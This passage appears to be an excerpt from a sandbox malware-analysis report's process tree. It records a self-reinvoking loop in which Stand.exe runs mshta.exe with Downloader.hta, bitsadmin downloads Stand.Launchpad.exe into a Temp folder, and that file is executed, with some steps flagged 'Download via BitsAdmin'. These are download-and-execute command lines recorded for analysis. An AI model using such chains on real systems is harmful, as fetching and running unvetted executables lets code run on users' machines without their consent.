        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        289⤵
        
        PID:6808
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        290⤵
        
        PID:2368
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        290⤵
        
        PID:1288
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        291⤵
        Download via BitsAdmin
        
        PID:5976
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        291⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        292⤵
        
        PID:3452
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        292⤵
        
        PID:1960
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        293⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        293⤵
        
        PID:6916
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        294⤵
        
        PID:6592
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        294⤵
        
        PID:5988
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        295⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        295⤵
        
        PID:6420
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        296⤵
        
        PID:6332
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        296⤵
        
        PID:2040
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        297⤵
        
        PID:6004
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        297⤵
        
        PID:2056
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        298⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        298⤵
        
        PID:2268
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        299⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        299⤵
        
        PID:5880
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        300⤵
        
        PID:2536
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        300⤵
        
        PID:4860
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        301⤵
        
        PID:6604
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        301⤵
        
        PID:4960
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        302⤵
        
        PID:5780
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        302⤵
        
        PID:7124
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        303⤵
        
        PID:2840
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        303⤵
        
        PID:4196
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        304⤵
        
        PID:4112
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        304⤵
        
        PID:7160
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        305⤵
        Download via BitsAdmin
        
        PID:3472
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        305⤵
        
        PID:3244
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        306⤵
        
        PID:956
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        306⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        307⤵
        
        PID:5148
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        307⤵
        
        PID:6284
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        308⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        308⤵
        
        PID:5136
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        309⤵
        Download via BitsAdmin
        
        PID:6892
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        309⤵
        
        PID:4020
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        310⤵
        
        PID:3396
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        310⤵
        
        PID:6792
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        311⤵
        Download via BitsAdmin
        
        PID:7016
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        311⤵
        
        PID:3636
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        312⤵
        
        PID:916
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        312⤵
        
        PID:7036
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        313⤵
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        313⤵
        
        PID:3952
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        314⤵
        
        PID:3768
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        314⤵
        
        PID:2324
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        315⤵
        
        PID:5908
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        315⤵
        
        PID:6396
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        316⤵
        
        PID:7140
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        316⤵
        
        PID:3308
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        317⤵
        
        PID:6352
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        317⤵
        
        PID:7068
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        318⤵
        
        PID:1576
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        318⤵
        
        PID:6552
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        319⤵
        Download via BitsAdmin
        
        PID:4584
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        319⤵
        
        PID:5400
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        320⤵
        
        PID:276
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        320⤵
        
        PID:6664
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        321⤵
        
        PID:3992
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        321⤵
        
        PID:5200
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        322⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        322⤵
        
        PID:2608
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        323⤵
        
        PID:6844
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        323⤵
        
        PID:2672
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        324⤵
        
        PID:6148
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        324⤵
        
        PID:3412
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        325⤵
        
        PID:6884
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        325⤵
        
        PID:7032
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        326⤵
        
        PID:2240
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        326⤵
        
        PID:5564
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        327⤵
        
        PID:1048
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        327⤵
        
        PID:1552
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        328⤵
        
        PID:1492
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        328⤵
        
        PID:7092
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        329⤵
        Download via BitsAdmin
        
        PID:6756
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        329⤵
        
        PID:3344
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        330⤵
        
        PID:1544
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        330⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        331⤵
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        331⤵
        
        PID:4720
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        332⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        332⤵
        
        PID:6488
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        333⤵
        Download via BitsAdmin
        
        PID:4252
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        333⤵
        
        PID:6228
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        334⤵
        
        PID:5968
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        334⤵
        
        PID:5424
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        335⤵
        
        PID:3724
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        335⤵
        
        PID:6632
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        336⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        336⤵
        
        PID:1076
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        337⤵
        
        PID:6204
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        337⤵
        
        PID:4976
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        338⤵
        
        PID:776
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        338⤵
        
        PID:5596
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        339⤵
        
        PID:5172
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        339⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        340⤵
        
        PID:6868
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        340⤵
        
        PID:4836
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        341⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        341⤵
        
        PID:6904
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        342⤵
        
        PID:5880
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        342⤵
        
        PID:4748
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        343⤵
        Download via BitsAdmin
        
        PID:6296
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        343⤵
        
        PID:7020
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        344⤵
        
        PID:6700
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        344⤵
        
        PID:5196
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        345⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        345⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        346⤵
        
        PID:2808
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        346⤵
        
        PID:3644
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        347⤵
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        347⤵
        
        PID:4932
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        348⤵
        
        PID:6200
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        348⤵
        
        PID:4208
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        349⤵
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        349⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        350⤵
        
        PID:4028
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        350⤵
        
        PID:3564
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        351⤵
        
        PID:4856
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        351⤵
        
        PID:3332
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        352⤵
        
        PID:4712
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        352⤵
        
        PID:3760
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        353⤵
        
        PID:7116
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        353⤵
        
        PID:284
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        354⤵
        
        PID:5036
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        354⤵
        
        PID:6460
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        355⤵
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        355⤵
        
        PID:5072
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        356⤵
        
        PID:5748
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        356⤵
        
        PID:6792
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        357⤵
        
        PID:6824
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        357⤵
        
        PID:4084
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        358⤵
        
        PID:5624
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        358⤵
        
        PID:6176
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        359⤵
        Download via BitsAdmin
        
        PID:3584
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        359⤵
        
        PID:3312
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        360⤵
        
        PID:5000
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        360⤵
        
        PID:4808
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        361⤵
        
        PID:6944
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        361⤵
        
        PID:5620
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        362⤵
        
        PID:1964
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        362⤵
        
        PID:5400
        
        C:\Windows\SysWOW64\bitsadmin.exe
